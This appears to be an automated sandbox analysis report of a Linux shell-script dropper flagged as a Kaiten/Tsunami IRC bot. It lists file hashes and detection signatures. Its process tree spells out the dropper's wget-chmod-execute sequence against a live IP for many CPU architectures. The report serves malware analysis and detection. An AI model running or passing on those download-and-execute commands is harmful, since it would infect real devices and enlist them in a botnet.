Analysis
-
max time kernel
149s -
max time network
187s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
22-08-2024 01:05
Static task
static1
Behavioral task
behavioral1
Sample
10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh
-
Size
1KB
-
MD5
b9befa17ec3fd1f1e6578a484a24d5f2
-
SHA1
bacbd92599131e2633a7780540677b859d3f62e0
-
SHA256
10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273
-
SHA512
6bd3e394a9d364d3316f01b19b2b23439ca1b048850502d8778f9de76db75739f108d67de271bb119a69181cbdfe998d7afcb6a3dda7ff1ae1ffdad3d4c0a6a9
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 11 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_kaiten2 behavioral2/files/fstream-3.dat family_kaiten2 behavioral2/files/fstream-4.dat family_kaiten2 behavioral2/files/fstream-5.dat family_kaiten2 behavioral2/files/fstream-6.dat family_kaiten2 behavioral2/files/fstream-7.dat family_kaiten2 behavioral2/files/fstream-8.dat family_kaiten2 behavioral2/files/fstream-9.dat family_kaiten2 behavioral2/files/fstream-10.dat family_kaiten2 behavioral2/files/fstream-11.dat family_kaiten2 behavioral2/files/fstream-12.dat family_kaiten2 -
Executes dropped EXE 11 IoCs
ioc pid Process /tmp/driver.eth0 681 driver.eth0 /tmp/driver.eth0 691 driver.eth0 /tmp/driver.eth0 696 driver.eth0 /tmp/driver.eth0 709 driver.eth0 /tmp/driver.eth0 723 driver.eth0 /tmp/driver.eth0 736 driver.eth0 /tmp/driver.eth0 750 driver.eth0 /tmp/driver.eth0 765 driver.eth0 /tmp/driver.eth0 773 driver.eth0 /tmp/driver.eth0 783 driver.eth0 /tmp/driver.eth0 798 driver.eth0 -
Reads runtime system information 11 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/botirc.m68k wget File opened for modification /tmp/botirc.mpsl wget File opened for modification /tmp/botirc.ppc wget File opened for modification /tmp/botirc.sh4 wget File opened for modification /tmp/botirc.arm6 wget File opened for modification /tmp/botirc.i686 wget File opened for modification /tmp/botirc.arm5 wget File opened for modification /tmp/botirc.arm wget File opened for modification /tmp/botirc.x86 wget File opened for modification /tmp/botirc.mips wget File opened for modification /tmp/botirc.arm7 wget
Processes
-
/tmp/10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh/tmp/10795dd5d92ebda288692b36bb0197f1b3a21351984046c94d84cba7c1c88273.sh1⤵PID:655
-
/usr/bin/wgetwget http://176.123.1.32/botirc.mips2⤵
- Writes file to tmp directory
PID:657
-
-
/bin/chmodchmod 777 botirc.mips2⤵PID:678
-
-
/bin/mvmv botirc.mips driver.eth02⤵
- Reads runtime system information
PID:680
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:681
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.arm72⤵
- Writes file to tmp directory
PID:684
-
-
/bin/chmodchmod 777 botirc.arm72⤵PID:689
-
-
/bin/mvmv botirc.arm7 driver.eth02⤵
- Reads runtime system information
PID:690
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:691
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.arm52⤵
- Writes file to tmp directory
PID:693
-
-
/bin/chmodchmod 777 botirc.arm52⤵PID:694
-
-
/bin/mvmv botirc.arm5 driver.eth02⤵
- Reads runtime system information
PID:695
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:696
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.arm62⤵
- Writes file to tmp directory
PID:697
-
-
/bin/chmodchmod 777 botirc.arm62⤵PID:706
-
-
/bin/mvmv botirc.arm6 driver.eth02⤵
- Reads runtime system information
PID:707
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:709
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.arm2⤵
- Writes file to tmp directory
PID:711
-
-
/bin/chmodchmod 777 botirc.arm2⤵PID:719
-
-
/bin/mvmv botirc.arm driver.eth02⤵
- Reads runtime system information
PID:721
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:723
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.i6862⤵
- Writes file to tmp directory
PID:725
-
-
/bin/chmodchmod 777 botirc.i6862⤵PID:732
-
-
/bin/mvmv botirc.i686 driver.eth02⤵
- Reads runtime system information
PID:734
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.m68k2⤵
- Writes file to tmp directory
PID:738
-
-
/bin/chmodchmod 777 botirc.m68k2⤵PID:746
-
-
/bin/mvmv botirc.m68k driver.eth02⤵
- Reads runtime system information
PID:747
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:750
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.mpsl2⤵
- Writes file to tmp directory
PID:754
-
-
/bin/chmodchmod 777 botirc.mpsl2⤵PID:763
-
-
/bin/mvmv botirc.mpsl driver.eth02⤵
- Reads runtime system information
PID:764
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:765
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.ppc2⤵
- Writes file to tmp directory
PID:767
-
-
/bin/chmodchmod 777 botirc.ppc2⤵PID:771
-
-
/bin/mvmv botirc.ppc driver.eth02⤵
- Reads runtime system information
PID:772
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:773
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.sh42⤵
- Writes file to tmp directory
PID:775
-
-
/bin/chmodchmod 777 botirc.sh42⤵PID:780
-
-
/bin/mvmv botirc.sh4 driver.eth02⤵
- Reads runtime system information
PID:781
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:783
-
-
/usr/bin/wgetwget http://176.123.1.32/botirc.x862⤵
- Writes file to tmp directory
PID:787
-
-
/bin/chmodchmod 777 botirc.x862⤵PID:794
-
-
/bin/mvmv botirc.x86 driver.eth02⤵
- Reads runtime system information
PID:796
-
-
/tmp/driver.eth0./driver.eth02⤵
- Executes dropped EXE
PID:798
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
80KB
MD5230b810b1ccfa160ed883481415c17e9
SHA1b2b9f9702f7c45a99aa883d1c09f72f7b30178df
SHA25650f1703bc940d6f089f4bc88843b067a6dd160f1f0fa8c8f8753645fdec72c51
SHA5120720eabc44d4e64679109d1647e0693e13a79d7fd7182588b581a9d0fd8949de511d825dab80e1a863ff93f82233c235db8d6b415b3f033f2c9f8e1c73953a17
-
Filesize
33KB
MD50666a3a5a5708019b91abd0cb49b6edc
SHA15516d3bc73ec89f8da82353a794a300342c935b7
SHA2567764cb8273b6a081d0ff7ae03b597c4cf8324f3e12ab747e9e2952f784d5eb31
SHA5126465759ac57572fc2140f5a683d3ac8f9e0bd0f6923ddf28277d38302f2e7d8171617e092a82a3bc6cd18ad4e6b799557a05317e9cc4c7b4b77359e9c306b580
-
Filesize
92KB
MD54950c0663fd6e23a4e051aa2df40be6a
SHA15f38959854a181da3ac960bb7e6bcf86c7c5e81e
SHA256a8715e839217f5a42bc8ef43dbede42fb4d8df858ca57ea1ba19a2d592c15e24
SHA512eb45df9a2e4f60eac458dc925236d11215041604523441c03c5c49a83e9bed9a0519e732ffcdceefbc005efc57a05a569d6b3772e7b471cd5339cefb3f7ad89a
-
Filesize
153KB
MD501b9e69dcb41c1b2f8a73dfbe3a03fc3
SHA1f216d5646186f208d8ecd19908f710d9810b8360
SHA25616732f097af3bd905dde2ab557e574d1ec5188af1bf4b4020614ee394e3b52c9
SHA512b3ba52b8c51fee6687912390494d471bb3ba7d6bbf3bb77524ce96fcad20d857d777ee8e4b34576e5afe86942ade3dda5787a82a8f54d35fb5bdc09fdfda3011
-
Filesize
60KB
MD59dbee98633e8ea12a0ea9d89850395ef
SHA19ff91da8b0313f4513a4cc2204aed67205487588
SHA2566fdc6218b22fe56a22805e2cfe77f0e4c3c35bf7416f792f9aac0f49d8fe61ee
SHA512ae24d6b8067f6bc0960dd852e8261892816c5efc76aa93d8198a7cebf9cc438d2405e5e910df687a4467d6fe2b7217ab815e2d7032a51b1bae31d0ff481dade3
-
Filesize
76KB
MD5375e4983b3c9a1d4bfa1881d5ebdedb6
SHA14a2517c600ce0564f5a17050c3b348799cfc4214
SHA25658df02cc367f5e445584bdaf399989c65734ac1cb349197550be2aca109ca871
SHA5124b4f1989315d4ff6d1b985292ef5aff53214c377e6c895140682d72a26abd4a092237a8420bcc08311c3de75737bee7d17fb1e714f265b7fdf3f58db202e82e9
-
Filesize
88KB
MD5356fb8228ff77baa0b8bda8fc7ed9ca7
SHA1e0612b67477f0c30894bec9d113a94f05d04e648
SHA2566c121a7179706dba4f2c76d4995488ebe492b831dc3c3dcc6b6938911b5b041d
SHA5127b0331cdc1cad3aebe594622a4989b72631a0181cec1aaed9a474e8c3b4a3b1ef49c7edd6ef157a6fa10b70ed78a68f25f6d7511e550c9defd26d8d33cea0604
-
Filesize
88KB
MD58056d097e1340b7c4f8e34890f4dcb79
SHA1e61a7766e15df7ee5e1788eae07272faf2d45e94
SHA2567bfd44d5db818732f710809434fa4c3c2dbc001c27016710edba58e047283f1f
SHA512d9500d174f9d88659cfaec99ec9e72dfec1cc0be3ba7393810f620882efbe9172b21d57a17ad1b35d1ad6c6e10c0039ce6f4467b5ded4a7f9a46ffc5829821a6
-
Filesize
69KB
MD5575b8a7a7a34a59916ac2dca17b46a9d
SHA13c0db7fe1e619dae66648fc2c8803854d8f4c438
SHA2560a073f905cfa696a77a34a7217e7b9006bf0cc2b45da59de2bf983fd58d91648
SHA5129ad087f848f58ad629ce6d41029a9db190a9f8c7d3560b8978815bdfd1536a78ce0fc24e5debfd04499ff38edff58d28acf15290848583f674c4184ae90977fa
-
Filesize
62KB
MD52d1b33df3d011a2114e214144fc15eed
SHA1e9fddb6d7ec33f348c274cd6237d92dca234e8a9
SHA256c5952262a01f18bab640b314ca71ff85b4fe423ad82ba912b2146f55abaeab50
SHA512d49c0fc4f1502aab542d069c5bc18a415f477ec25892b26b67ca92ee4c9f32446eee608ecb7f34112164dff88eeee4caab058798c8558c5903aadc67577d6401
-
Filesize
58KB
MD53a060ab202d9bffe1443a20c4871c236
SHA1047f71e6c59270e292f5ac534b41f944144312bd
SHA2564e21f5e14cc94b4fbd2c1df83799592a39e9ee15075daf1ab73bb361e64efdf8
SHA5129355a568fdcbf2df2af808cc0af6dccc9f3ab6a2c6d26d7b181b6fb79f7433bd8480277ec26911cbbe80acb06698d2bf66aedbf3a33596842bfa8ff6dc495090